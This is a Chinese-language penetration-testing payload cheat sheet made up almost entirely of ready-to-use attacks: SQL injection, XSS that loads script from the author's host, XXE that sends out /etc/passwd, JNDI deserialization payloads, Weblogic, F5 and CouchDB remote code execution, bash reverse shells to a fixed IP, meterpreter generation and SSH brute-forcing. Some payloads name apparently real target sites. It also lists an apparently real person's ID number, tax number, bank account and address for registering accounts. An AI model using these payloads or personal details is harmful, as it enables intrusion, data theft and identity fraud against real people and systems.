【置顶】渗透测试Payload记录

SQLi

模糊查询
%' and '%'='%

模糊查询
%'and'%'='%

if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/

放在GET类型：
if(now()%3Dsysdate()%2Csleep(10)%2C0)%2f*'XOR(if(now()%3Dsysdate()%2Csleep(10)%2C0))OR'"XOR(if(now()%3Dsysdate()%2Csleep(10)%2C0))OR"*%2f%0A

JSON:
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'%22XOR(if(now()=sysdate(),sleep(10),0))OR%22*/

报错：
'%20AND%20(SELECT%203607%20FROM(SELECT%20COUNT(*),CONCAT(0x716b716271,(SELECT%20(ELT(3607=3607,1))),0x7171766271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'ycfF'='ycfF

XSS

绕on事件

1
2
3

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

XSS备忘录    https://zhuanlan.zhihu.com/p/98177600

n个事件 https://www.cnblogs.com/hookjoy/p/4109682.html

探针 && 盲打
</tExtArEa>'"><sCrIpt src=https://xs.laker.top/s></ScRiPt>
'"><sCrIpt src=https://xs.laker.top/s></ScRiPt>

data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMTExKT4=
</tExtArEa>'"><sCRiPt>alert(1)</sCrIpT>
%3c/tExtArEa%3e'"%3e%3cscript src="https://1e3.laker.top/myjs/1.js"%3e%3c/script%3e

DOM-XSS关键词（Burp）

1
2
3

(?:location\.href)|(?:location\.search)|(?:location\.hash)|(?:location\.pathname)    # 从输入的关键词

(?:document\.write\()|(?:innerHtml\()|(?:eval\()|(?:\.html\()|(?:\.append\()         # 从输出的关键词

较常用

1	(?:document\.write\()\|(?:innerHtml\()\|(?:eval\()

CSRF

无Referer:

<html>
  <body>
    <form action="https://tjzb.newhealth.com.cn/personal/home" method="POST">
      <input type="hidden" name="desktopIndex" value="https://baidu.com" />
      <input type="hidden" name="mobileIndex" value="https://baidu.com" />
      <input type="submit" value="CSRF绕过" />
    </form>
  </body>
</html>

GET型：

1	<img src="http://***">

JSONP

<script>
function useUserInfo(v){
  alert(v.username);
}
</script>
<script src="http://www.test.com/userinfo?callback=useUserInfo"></script>

WebSocket

GET ws://echo.websocket.org/?encoding=text HTTP/1.1
Host: echo.websocket.org
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Origin: http://www.malicious.website.com
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6
Cookie: _gat=1; _ga=GA1.2.290430972.14547651; JSESSIONID=1A9431CF043F851E0356F5837845B2EC
Sec-WebSocket-Key: 7ARps0AjsHN8bx5dCI1KKQ==
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits

1566206867660

PS: 跨域资源共享不适应于 WebSocket，WebSocket 没有明确规定跨域处理的方法。

CORS

GET:

<script type="text/javascript">
    var xhr = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.onreadystatechange = function() {
        if(xhr.readyState === 4) {
            alert(xhr.responseText);
        }
    }
    xhr.open("GET", "https://***");
    xhr.send();
</script>

POST:


<script src="http://www.jq22.com/jquery/jquery-3.3.1.js"></script>
<script type="text/javascript">
    $.post(
	{
		type: "post",
		url: "https://***", 
		contentType: "application/json; charset=utf-8",
		xhrFields: {
                      		withCredentials: true
              		},
		crossDomain: true,
		data: JSON.stringify(
			{"protocol":{"fromPlatform":"venus_jquery_fnc_biz_web","functionCode":"order_list"},"param":{"filter":{"orderType":"all","lastMonths":0,"queryStartDate":"","queryEndDate":""},"page":1,"size":8}}
		),
		success: function(data){
						alert("hijack: " + JSON.stringify(data));
				},
	}
 );
</script>

除此之外，利用SWF_JSON_CSRF的POC:

<embed src="http://www.0xby.com/swf_json_csrf/test.swf?endpoint=http://baidu.com/aaa/bb/test.do&reqmethod=POST&ct=application/json;charset=UTF-8&jsonData={'k1':'v1','k2':'v2'}&php_url=http://www.0xby.com/swf_json_csrf/test.php" type="application/x-shockwave-flash"/>

CROS（ Access-Control-Allow-Origin: * ）绕过

https://hackerone.com/reports/761726

<html>
<script>  
var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}";  
fetch(url, {    
    method: 'GET',    
    cache: 'force-cache'
    });
</script>
</html>

Clickjacking

<html>
<head>
<title>Clickjacking</title>
</head>
<body>
<iframe src="http://***" width="1200" height="600" />
</body>

HTTP请求走私

见POST参数修改path和host和指向目标

POST / HTTP/1.1
Host: laker.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4181.9 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,en;q=0.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

SSI

1	<!-- exec cmd="whoami"-->

ESI

1	<esi:include src="http://s5beqn.ceye.io" />

LDAP注入

1	admin)(&))

前端探针：

1	`';<!--"<XSS>=<!--esi-->{{77}}{%77%}&{()}

XXE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % remote SYSTEM "http://120.79.91.29/evil.dtd">
%remote;%all;
]>
<foo>
    <code>&send;</code>
    <msg>mypass</msg>
</foo>

恶意的DTD；

1	<!ENTITY % all "<!ENTITY send SYSTEM 'http://120.79.91.29:9999?q=%file;'>">

OOB数据传输：

1	<!ENTITY % all "<!ENTITY send SYSTEM 'http://ip:port?p=%file;'>">

PS:需要注意Content-Type: application/xml

FastJson<=1.2.48

{
  "name": {
    "@type": "java.lang.Class",
    "val": "com.sun.rowset.JdbcRowSetImpl"
  },
  "x": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "ldap://120.79.91.29:9999/Exploit",
    "autoCommit": true
  }
}

PS:需要注意Content-Type: application/json

Weblogic

访问页面：

http://wscpay.sptcc.com/_async/AsyncResponseService

POST /_async/AsyncResponseService HTTP/1.1
Host: 220.248.104.180
Content-Length: 760
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/soap+xml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping 120.79.91.29</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

CVE-2017-10271
http://192.168.8.148:7001/wls-wsat/CoordinatorPortType11


CVE-2018-2628
检测weblogic版本信息和t3协议是否开启。只针对没打补丁的情况下的检测。
nmap -n -v -p7001,7002 IP --script=weblogic-t3-info

CVE-2020-14882
http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27ping%20119.23.31.7%27);%22);

反弹shell的语句

编码网站
http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/119.23.31.7/8998 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuMjMuMzEuNy84OTk4IDA+JjE=}|{base64,-d}|{bash,-i}

metasploit

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=119.23.31.7 LPORT=4567 -f elf > shell.elf
mv shell.elf /var/www/html/shell.elf


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
msf exploit(handler) > set LPORT 4567
msf exploit(handler) > exploit -j

注册真实身份证号（来自网络）


姚嫣然 440983198311220309
纳税  12500000450401805G
卡号  50001033600050008726
开户  中国建设银行重庆九龙坡金凤支行
   
地址、电话  重庆市渝中区医学院路1号68486151

Jackson

1	["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://127.0.0.1:8005/~/test"}]

1	["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://120.79.91.29:9999/inject.sql'"}]

CVE-2020-8840

1	["org.apache.xbean.propertyeditor.JndiConverter", {"asText":"ldap://120.79.91.29:9999/ExportObject"} ]

PS:需要注意Content-Type: application/json

Spring Boot Actuator

/jolokia/list
/env
/jolokia/read<svg%20onload=alert(document.cookie)>?mimeType=text/html

{
    "type": "EXEC",
    "mbean": "Users:database=UserDatabase,type=UserDatabase",
    "operation": "createRole",
    "arguments": ["manager-gui", ""]
}

Spring SpEL注入

${7*7}
${T(java.lang.system).getenv()}
${T(java.lang.Runtime).getRuntime().exec(T(java.
lang.Character).toString(105).concat(T(java.lang.Character).toString(100)))}

Phpstudy后门

1 2	Accept-Encoding:gzip,deflate Accept-Charset:c3lzdGVtKCd3aG9hbWknKTs=(whoami)

1569678510656

泛微OA注入

POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1

formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

标志response:ADDRESS=(PROTOCAL=TCP)

ASPX写入

1
2
3

aaaa
<%@ Page Language="Jscript" Debug=true%>
<%Response.Write("webshell");%>

Apache Shiro确认

Cookie: rememberMe=1

xmlrpc

Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
	<methodName>wp.getUsersBlogs</methodName>
		<params>
			<param><value>username</value>
			</param>    
			<param><value>password</value>
			</param>
		</params>
</methodCall>


Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<methodCall> 
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value>
        <string>http://127.0.0.1:1133</string>
      </value>
    </param>
    <param>
      <value>
        <string>ladybird</string>
      </value>
    </param>
  </params>
</methodCall>

Apache Shiro 1.4.2以下版本

java -jar ysoserial.jar CommonsBeanutils1 "ping 120.79.91.29" > payload.ser

java -jar ysoserial.jar URLDNS "http://s5beqn.ceye.io" > payload.ser

执行java -jar PaddingOracleAttack.jar targetUrl rememberMeCookie blockSize payloadFilePath，例如:
rememberMeCookie是认证成功在Cookie存在的一个key、我们需要取得他的value
如设置Request中&rememberMe=true然后Set-Cookie: rememberMe=*** ,那么***则是rememberMe-Cookie


java -jar PaddingOracleAttack-1.0-SNAPSHOT.jar "https://www.tatmasglobal.net/admin/code/sms-provider/login" RUdYhxX1kOHogjre9PPUDuUxOMJTkmLqzTC02TChdNhRpYwVCYq5BKQbVCzL8NCLCXT+UqipNRM3Mp4pgLMhOf5qzW3881ATix8iH1cIU44YV/4s2o1ob527FKv4dflMcjpVhxlri6x2XS6ho6U1nUjdKJmWvdQYh/VWu/3YQS9hbrUY+Dvjn1o+RFHYJ5TbPMCW7Ml2scFNrNOFxHv46wVZ2x1ERfpoRTBgs6Zs7PnivID6as0J9SJDcJgq4ReRZ6rhVHqAlsfKqFqanswMtSZsRlWV1qspFsQ2sURhQbD2NXKYKQzTn/dJHw675bGwccpfcC1Tl/8HruHaODPxoWtcfYwZrmIq3EKZCcjIath40U3X97nGJ4V2M5z7Uff9t0ToocN9nJqE1I2CtNSlsp7dBaYiJ/Hw8Mb/LBkMNW1e1bOQKSZ8n1VOz5sXpJtPdWLGNONonuqkEzZSwzFhPc4hPCC6cQl9K4z2SQlG3v3D5ESn9LOIryzwG0t6PHF3XuNpNniAfJn4tNSLi1kazMUAZ7rwzM8nZbRepw== 16 payload.bin

Nmap常用未授权访问

1
2
3

nmap -p 8009 -iL 新建文本文档.txt -T4 -sS -Pn -sV > nmap_result.txt

nmap -p 27017,6379,11211,8080,5900,5901,2375,2181,837,9000 -iL 新建文本文档.txt -T4 -sS -Pn -sV > nmap_result.txt

9000 PHP-FPM

Nmap 弱口令

1	nmap -p 21,22,23,25,69,110,139,143,161,389,445,512,513,514,873,1433,1521,2049,2181,3306,3389,3690,4440,5000,5432,5900,6379,8069,9200 -iL 新建文本文档.txt -T4 -sS -Pn -sV > nmap_result.txt

JWT攻击

eyJ***.eyJ***.哈希   头部.内容部.hash部
https://jwt.io/#encoded-jwt
未校验签名攻击（拿到JWT密文）
	将JWT解base64、普通用户改admin、重加密
禁用哈希
	将头部 alg 置为 none、若服务器认可则可不需要密钥情况越权
弱密钥
	https://github.com/lmammino/jwt-cracker

F5-Big（443，fofa:app=”F5-BIGIP”）

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/1.txt&content=id

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/1.txt

https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list

读取
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/1.txt

Dubbo(12345端口)

from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient

client = DubboClient('127.0.0.1', 12345)

JdbcRowSetImpl=new_object(
      'com.sun.rowset.JdbcRowSetImpl',
      dataSource="ldap://120.79.91.29:9999/Exploit",
      strMatchColumns=["foo"]
      )
JdbcRowSetImplClass=new_object(
      'java.lang.Class',
      name="com.sun.rowset.JdbcRowSetImpl",
      )
toStringBean=new_object(
      'com.rometools.rome.feed.impl.ToStringBean',
      beanClass=JdbcRowSetImplClass,
      obj=JdbcRowSetImpl
      )

resp = client.send_request_and_return_response(
    service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
    method_name='rce',
    args=[toStringBean])

CouchDB （5984端口）

	1. 新增query_server配置，这里将执行whoami命令并保存结果到/tmp/6666文件中
curl -X PUT 'http://192.168.2.12:5984/_config/query_servers/cmd' -d '"whoami>/tmp/6666"'
	// _config/query_servers/ 固定
	// merver 可改
	2. 新建一个临时表，插入一条记录

curl -X PUT 'http://192.168.2.12:5984/vultest'
curl -X PUT 'http://192.168.2.12:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'

	//vulteste 以及vul可改
	3. 调用query_server处理数据
curl -X POST 'http://192.168.2.12:5984/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'

用友NC Cloud（NC<=6.5,dork:Yonyou NC httpd）

1	/ServiceDispatcherServlet/default 存在

nodepad++去重的正则：

1	^(.?)$\s+?^(?=.^\1$)

hydra

1	hydra -l root -P ssh_password.txt -t 11 ssh://119.23.31.7

CVE-2020-13935

1
2
3

https://github.com/RedTeamPentesting/CVE-2020-13935

tcdos.exe ws://127.0.0.1:8080/examples/websocket/echoProgrammatic